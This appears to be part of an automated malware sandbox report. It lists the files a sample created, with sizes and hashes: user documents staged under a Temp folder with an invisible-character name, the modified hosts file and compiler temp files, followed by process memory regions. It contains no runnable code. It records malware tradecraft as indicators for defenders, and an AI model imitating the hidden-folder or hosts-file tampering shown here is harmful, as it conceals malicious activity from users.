                                                                                                        504ecda7a16cef3719bf990ad1c02e0068c6d0da

                                                                                                        SHA256

                                                                                                        b0cfc90e750921c18971e2da6a12db425418a8482bbea3f08ed15d0e3321db0a

                                                                                                        SHA512

                                                                                                        d38b25848cf82fdbf5b559911e3babd7ec8b9d6c58d43e4c81a9ac3f7bafbb52853a03482530a496750775f6c1cf4b433b41b142d05440e10086cee98b4d1863

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Desktop\ExpandConnect.docx

                                                                                                        Filesize

                                                                                                        12KB

                                                                                                        MD5

                                                                                                        8f8c021a6c910bcd005554a892dacb21

                                                                                                        SHA1

                                                                                                        bbeb45280e00c1c7542b87e195b5cc8cbaa1a2a9

                                                                                                        SHA256

                                                                                                        58ec1e1e96b82e6e11aae28bb3dc1728a6daae900d11cdf28362ecfd6b3167ad

                                                                                                        SHA512

                                                                                                        67605d8d02f2efe6df9796e29c1ba92369ecebf78d669e22602d7d629d5c501bfb536e230d90b22af9d9031bb2a6db8c217a386c08b4ce454b055ae7a7075d94

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Desktop\ExpandStep.csv

                                                                                                        Filesize

                                                                                                        781KB

                                                                                                        MD5

                                                                                                        56492d62052ac93145474331dee895fb

                                                                                                        SHA1

                                                                                                        5143a2f3a62f5f22846fe662ebf9a092df9ed5ab

                                                                                                        SHA256

                                                                                                        321a8d2846eab4b6dfa11331c00749b3c30889197ed6cb871d74af74e9bd719d

                                                                                                        SHA512

                                                                                                        76578f6df54fe43cd657fc134015fb26aacaac8cd948a4985a90624f3a952d4b217303eab89b02df8791f3f28619a6bd9c275f4f2ae65a39cf34add0555f3f60

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Desktop\JoinUse.docx

                                                                                                        Filesize

                                                                                                        13KB

                                                                                                        MD5

                                                                                                        44cfcf3316c50f59168b3791cf634348

                                                                                                        SHA1

                                                                                                        0d63eb8dd67f5e7b566dc86ba4c858404ea2e704

                                                                                                        SHA256

                                                                                                        294f003f31e897f1efb1956bf472154feaf25b20cf6eec6f1221b227a80b0c8c

                                                                                                        SHA512

                                                                                                        91fb844faf61198b5703dca23837d1e335f6056f25c12424b50a7e5a93e140f733d8a3044ea172c474f731c0949a7b712df64305aa1df9bc5241e74b617df059

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Desktop\ResumeRequest.mp4

                                                                                                        Filesize

                                                                                                        987KB

                                                                                                        MD5

                                                                                                        c80047e0634b8b919e3b292cc509e02d

                                                                                                        SHA1

                                                                                                        7004aca880230c8ffe9b75d91d17b7ac5aa8c9f4

                                                                                                        SHA256

                                                                                                        680185d6da0dc06ca8155665f3f4bd171a8c9d3f6da8024bc9b0c2909e8884d3

                                                                                                        SHA512

                                                                                                        ab8191c08a327f68e35330ea8f90a84d6938427a259069b7c2c322ebda0e62f9fe7bc7d7f089b4f1488cb07b1148ceca1731f83d1b60e4ab8eb54386e4a5d371

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Desktop\UnpublishRequest.mp3

                                                                                                        Filesize

                                                                                                        1.4MB

                                                                                                        MD5

                                                                                                        7abc87305c987436c4c843058a7cc679

                                                                                                        SHA1

                                                                                                        b9f46ad72ba63e91883cf8928db2972e9e492878

                                                                                                        SHA256

                                                                                                        7c85243f563c65615f022a08ecb39e4ccc99f07631a235a95b6dca422a7eaaa2

                                                                                                        SHA512

                                                                                                        52f12a78536fc064dcdd0412bb3934b488e940bc6852575436c3571d3a41fb8446e6a7398478da5edc8f8db1a4a85ab1e185fbaacfb286d722fba24e10bffa73

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Documents\CompleteSet.xlsx

                                                                                                        Filesize

                                                                                                        748KB

                                                                                                        MD5

                                                                                                        6c8aa1b51cfb8c8aca20803d32fb8f43

                                                                                                        SHA1

                                                                                                        b10b8e0dbdc3259ef04cdfb58afb11170ad1aa10

                                                                                                        SHA256

                                                                                                        8ff67415cbb5c0adff2602813f02aeb3efc2c6c69518fac13ab6cf5509644302

                                                                                                        SHA512

                                                                                                        d11f98715780c0c1e3aed29609d9928b7ba4eb68a25000b5f44b533c0ff3f0eaa0e4ad04e999e5d732d2abe0b957456910641c1badd0a215af216cf05f819f69

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Documents\FormatHide.xlsx

                                                                                                        Filesize

                                                                                                        512KB

                                                                                                        MD5

                                                                                                        794a0e785111c2f2a5f02b5edf9e64ae

                                                                                                        SHA1

                                                                                                        18c82b0bb1cc5e0f654d317891f95f4b7d6ae8fb

                                                                                                        SHA256

                                                                                                        8ee1ed1ec1adb13a592d590ee60e9cea09e9ade36784ec7401b5bde054488a3f

                                                                                                        SHA512

                                                                                                        4296607ec07ed1184ffce5d99f9887f4e7e6a6bfb487547f382bfd94605b73812d5cd39772feaac5f81fa93b2029b51bdf5aa6410be3a762f507280a649f03ad

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Documents\RedoSkip.xlsx

                                                                                                        Filesize

                                                                                                        14KB

                                                                                                        MD5

                                                                                                        f9cb48f33caf0cf4dcfa5cdd4383e0d5

                                                                                                        SHA1

                                                                                                        8c0c474b99f9f08d3537673b09ead807bdd9e9c5

                                                                                                        SHA256

                                                                                                        23b81d4063c6f59af188364df799700fae1765b6a2e9f1455c1088981f4a3a7c

                                                                                                        SHA512

                                                                                                        c26493054105edc575dc65a56900b66aec626ce5c9048cdb31c60b77728453676203d7235a792eb148280b70521099ec2576e172359ffdb7200e725812b3ec4d

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Downloads\BackupRename.wmf

                                                                                                        Filesize

                                                                                                        393KB

                                                                                                        MD5

                                                                                                        8fe8e4421dba0cc3d485228d30b2990a

                                                                                                        SHA1

                                                                                                        261203b47c462f4f75d5c8ebd1c94a1a79bb2a13

                                                                                                        SHA256

                                                                                                        64e6febf842fe53e25082ef22fb95eeba9a32787357e2118ab6d7c5d672ad8d8

                                                                                                        SHA512

                                                                                                        b25f435b4c5efa9d3139926a9cc1bae75a5981f8c16efdeb224ed185ee8a9c2ff6ac70aa85fd6d8627978ca1eebff8dd8f4c58282ded4a4dfb1b25c362ea1bca

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Downloads\InstallBackup.tif

                                                                                                        Filesize

                                                                                                        515KB

                                                                                                        MD5

                                                                                                        fbf4f6fb2efe496fc2ae990f72c89bc0

                                                                                                        SHA1

                                                                                                        00b64f6e2682462627c68726601881a7722f7ad6

                                                                                                        SHA256

                                                                                                        18a79b5b192aa7d8277b1c10e3b01378123c213a3daf5b6bcbd1110147e39dcb

                                                                                                        SHA512

                                                                                                        a6b88fe311f2792d3c69629d876f09a79aa4a770fbf2d13e90220f2a955ea110e34841727fa6f16fe02e810a4476e9de0eebc1cb42c5335d5950e6a6307506da

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Downloads\InvokeFormat.docx

                                                                                                        Filesize

                                                                                                        624KB

                                                                                                        MD5

                                                                                                        d54b6bd8bfc71dd7677f1549026351cd

                                                                                                        SHA1

                                                                                                        056fcca063d3deeca768066df84ea8b0190e182d

                                                                                                        SHA256

                                                                                                        31d044006d481472c3aa4d496c80dbeb456e0f39715755d30df7d20b745d4fb3

                                                                                                        SHA512

                                                                                                        d8411344659f73d24207c18865980c11114df465828211567a6884ea03d20714adcb7cde8c1b2e19a290fe5c906839b42813982c91be6b3ab4a81f04b0af06de

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Downloads\ProtectPublish.docx

                                                                                                        Filesize

                                                                                                        575KB

                                                                                                        MD5

                                                                                                        c2d2d02b80790e2c076f336a20cb54ca

                                                                                                        SHA1

                                                                                                        2c802b7bd7d1d8e6dc200f8761babeb18c892fc4

                                                                                                        SHA256

                                                                                                        3a92a8e2af9fadda9e259303c1188c505bb8c8b029bf1317b60598b73cf0f91b

                                                                                                        SHA512

                                                                                                        2b222168fcbc441d4499f5c0641a3e6861fb67258cd2c31d27ae07012e1d0bd43f9bc67d65158bb10afbe9c1989feaa7a10b7654111de4a979ff276810eb425e

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\  ‌‎ ​  ‌‏\Common Files\Downloads\PushUnlock.jpeg

                                                                                                        Filesize

                                                                                                        490KB

                                                                                                        MD5

                                                                                                        df5a5ee0d2c6773ccfadc764b6934f93

                                                                                                        SHA1

                                                                                                        9c1bad0e8dd014c9f5cc7e35aa9b8fe44d9b8b1d

                                                                                                        SHA256

                                                                                                        4dde8b84ee6db3034b6951290444ea746f83b011756d6e600afb238e66be7e2f

                                                                                                        SHA512

                                                                                                        4550edc3ba2fe2297f585f6c355e73522a996aebbb9544aedafad7c0324573d29fe994625dae9c2be5ee1e13f45573b9341767b0a93647262130d898f697773e

                                                                                                      • C:\Windows\System32\drivers\etc\hosts

                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                                        SHA1

                                                                                                        e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                                        SHA256

                                                                                                        a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                                        SHA512

                                                                                                        c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\j4avav5m\CSCAAC46EA17B94448282375096A12B1FE2.TMP

                                                                                                        Filesize

                                                                                                        652B

                                                                                                        MD5

                                                                                                        034481d45e5273c94fb62ceaf2ef707e

                                                                                                        SHA1

                                                                                                        87031b438ed849d8eb8e007efa9e9afac17867da

                                                                                                        SHA256

                                                                                                        6cc56e2954f31bf2d50aaf66fc7eb20f4e36318460fb4a9edbfcba376bd895f2

                                                                                                        SHA512

                                                                                                        f09029f8e1c5529d5c9511dddd954045a748a2fe820b6a7b17052288e22063b142fff45cac46eeaf176a722a16c55f73ce7a7ec064ce8ee7adbe44196207b6da

                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\j4avav5m\j4avav5m.0.cs

                                                                                                        Filesize

                                                                                                        1004B

                                                                                                        MD5

                                                                                                        c76055a0388b713a1eabe16130684dc3

                                                                                                        SHA1

                                                                                                        ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                        SHA256

                                                                                                        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                        SHA512

                                                                                                        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\j4avav5m\j4avav5m.cmdline

                                                                                                        Filesize

                                                                                                        607B

                                                                                                        MD5

                                                                                                        ac49f4e4cc55f58fb038a136551c133b

                                                                                                        SHA1

                                                                                                        34e1803e4000d36765c484c4396c76e91902d32d

                                                                                                        SHA256

                                                                                                        7dfa92cb87e8c07feb71a364e16157fb60977a515220029d0f7c6315e06c6b28

                                                                                                        SHA512

                                                                                                        8d4e5ba01fe568a7ffb2ef787673b0264e33e67f7c7ef8084ee93ce4501d12b803a5c4388e04922fdf690ad88b62ae53bc1694eb5b600f1206b01e4940f47eed

                                                                                                      • memory/472-60-0x00007FFCA78E0000-0x00007FFCA7A4F000-memory.dmp

                                                                                                        Filesize

                                                                                                        1.4MB

                                                                                                      • memory/472-333-0x00007FFCA7A70000-0x00007FFCA7B28000-memory.dmp

                                                                                                        Filesize

                                                                                                        736KB

                                                                                                      • memory/472-106-0x00007FFCA78E0000-0x00007FFCA7A4F000-memory.dmp

                                                                                                        Filesize

                                                                                                        1.4MB

                                                                                                      • memory/472-25-0x00007FFCA7230000-0x00007FFCA781A000-memory.dmp

                                                                                                        Filesize

                                                                                                        5.9MB

                                                                                                      • memory/472-105-0x00007FFCABB20000-0x00007FFCABB43000-memory.dmp

                                                                                                        Filesize

                                                                                                        140KB

                                                                                                      • memory/472-30-0x00007FFCABBD0000-0x00007FFCABBF3000-memory.dmp

                                                                                                        Filesize

                                                                                                        140KB

                                                                                                      • memory/472-231-0x00007FFCAA8B0000-0x00007FFCAA8DE000-memory.dmp

                                                                                                        Filesize

                                                                                                        184KB

                                                                                                      • memory/472-70-0x00007FFCA7230000-0x00007FFCA781A000-memory.dmp

                                                                                                        Filesize

                                                                                                        5.9MB

                                                                                                      • memory/472-73-0x00007FFCA2780000-0x00007FFCA2AF5000-memory.dmp

                                                                                                        Filesize

                                                                                                        3.5MB

                                                                                                      • memory/472-76-0x00007FFCAA890000-0x00007FFCAA8A4000-memory.dmp

                                                                                                        Filesize

                                                                                                        80KB

                                                                                                      • memory/472-240-0x00000221189D0000-0x0000022118D45000-memory.dmp

                                                                                                        Filesize

                                                                                                        3.5MB

                                                                                                      • memory/472-239-0x00007FFCA7A70000-0x00007FFCA7B28000-memory.dmp

                                                                                                        Filesize

                                                                                                        736KB

                                                                                                      • memory/472-81-0x00007FFCACFC0000-0x00007FFCACFD9000-memory.dmp

                                                                                                        Filesize

                                                                                                        100KB

                                                                                                      • memory/472-82-0x00007FFCA6E20000-0x00007FFCA6F3C000-memory.dmp

                                                                                                        Filesize

                                                                                                        1.1MB

                                                                                                      • memory/472-78-0x00007FFCABB50000-0x00007FFCABB7D000-memory.dmp

                                                                                                        Filesize

                                                                                                        180KB

                                                                                                      • memory/472-79-0x00007FFCAA880000-0x00007FFCAA88D000-memory.dmp

                                                                                                        Filesize

                                                                                                        52KB

                                                                                                      • memory/472-74-0x00007FFCABBD0000-0x00007FFCABBF3000-memory.dmp

                                                                                                        Filesize

                                                                                                        140KB

                                                                                                      • memory/472-71-0x00007FFCA7A70000-0x00007FFCA7B28000-memory.dmp

                                                                                                        Filesize

                                                                                                        736KB

                                                                                                      • memory/472-72-0x00000221189D0000-0x0000022118D45000-memory.dmp

                                                                                                        Filesize

                                                                                                        3.5MB

                                                                                                      • memory/472-66-0x00007FFCAA8B0000-0x00007FFCAA8DE000-memory.dmp

                                                                                                        Filesize

                                                                                                        184KB

                                                                                                      • memory/472-64-0x00007FFCABA90000-0x00007FFCABA9D000-memory.dmp

                                                                                                        Filesize

                                                                                                        52KB

                                                                                                      • memory/472-62-0x00007FFCACEF0000-0x00007FFCACF09000-memory.dmp

                                                                                                        Filesize

                                                                                                        100KB

                                                                                                      • memory/472-250-0x00007FFCA2780000-0x00007FFCA2AF5000-memory.dmp

                                                                                                        Filesize

                                                                                                        3.5MB

                                                                                                      • memory/472-270-0x00007FFCA7230000-0x00007FFCA781A000-memory.dmp

                                                                                                        Filesize

                                                                                                        5.9MB

                                                                                                      • memory/472-276-0x00007FFCA78E0000-0x00007FFCA7A4F000-memory.dmp

                                                                                                        Filesize

                                                                                                        1.4MB

                                                                                                      • memory/472-271-0x00007FFCABBD0000-0x00007FFCABBF3000-memory.dmp

                                                                                                        Filesize

                                                                                                        140KB

                                                                                                      • memory/472-58-0x00007FFCABB20000-0x00007FFCABB43000-memory.dmp

                                                                                                        Filesize

                                                                                                        140KB

                                                                                                      • memory/472-308-0x00007FFCA7230000-0x00007FFCA781A000-memory.dmp

                                                                                                        Filesize

                                                                                                        5.9MB

                                                                                                      • memory/472-323-0x00007FFCA2780000-0x00007FFCA2AF5000-memory.dmp

                                                                                                        Filesize

                                                                                                        3.5MB

                                                                                                      • memory/472-169-0x00007FFCACEF0000-0x00007FFCACF09000-memory.dmp

                                                                                                        Filesize

                                                                                                        100KB

                                                                                                      • memory/472-332-0x00007FFCAA8B0000-0x00007FFCAA8DE000-memory.dmp

                                                                                                        Filesize

                                                                                                        184KB

                                                                                                      • memory/472-331-0x00007FFCABA90000-0x00007FFCABA9D000-memory.dmp

                                                                                                        Filesize

                                                                                                        52KB

                                                                                                      • memory/472-330-0x00007FFCACEF0000-0x00007FFCACF09000-memory.dmp

                                                                                                        Filesize

                                                                                                        100KB

                                                                                                      • memory/472-329-0x00007FFCA78E0000-0x00007FFCA7A4F000-memory.dmp

                                                                                                        Filesize

                                                                                                        1.4MB

                                                                                                      • memory/472-328-0x00007FFCABB20000-0x00007FFCABB43000-memory.dmp

                                                                                                        Filesize

                                                                                                        140KB

                                                                                                      • memory/472-327-0x00007FFCACFC0000-0x00007FFCACFD9000-memory.dmp

                                                                                                        Filesize

                                                                                                        100KB

                                                                                                      • memory/472-326-0x00007FFCABB50000-0x00007FFCABB7D000-memory.dmp

                                                                                                        Filesize

                                                                                                        180KB

                                                                                                      • memory/472-325-0x00007FFCB11D0000-0x00007FFCB11DF000-memory.dmp

                                                                                                        Filesize

                                                                                                        60KB

                                                                                                      • memory/472-324-0x00007FFCABBD0000-0x00007FFCABBF3000-memory.dmp

                                                                                                        Filesize

                                                                                                        140KB

                                                                                                      • memory/472-322-0x00007FFCA6E20000-0x00007FFCA6F3C000-memory.dmp

                                                                                                        Filesize

                                                                                                        1.1MB

                                                                                                      • memory/472-321-0x00007FFCAA880000-0x00007FFCAA88D000-memory.dmp

                                                                                                        Filesize

                                                                                                        52KB

                                                                                                      • memory/472-320-0x00007FFCAA890000-0x00007FFCAA8A4000-memory.dmp

                                                                                                        Filesize

                                                                                                        80KB

                                                                                                      • memory/472-56-0x00007FFCACFC0000-0x00007FFCACFD9000-memory.dmp

                                                                                                        Filesize

                                                                                                        100KB

                                                                                                      • memory/472-54-0x00007FFCABB50000-0x00007FFCABB7D000-memory.dmp

                                                                                                        Filesize

                                                                                                        180KB

                                                                                                      • memory/472-32-0x00007FFCB11D0000-0x00007FFCB11DF000-memory.dmp

                                                                                                        Filesize

                                                                                                        60KB

                                                                                                      • memory/2708-188-0x00000299AD550000-0x00000299AD558000-memory.dmp

                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/2712-91-0x000001F371CC0000-0x000001F371CE2000-memory.dmp

                                                                                                        Filesize

                                                                                                        136KB

                                                                                                      • memory/3404-420-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-421-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-419-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-431-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-430-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-429-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-428-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-427-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-426-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/3404-425-0x00000229EF0B0000-0x00000229EF0B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB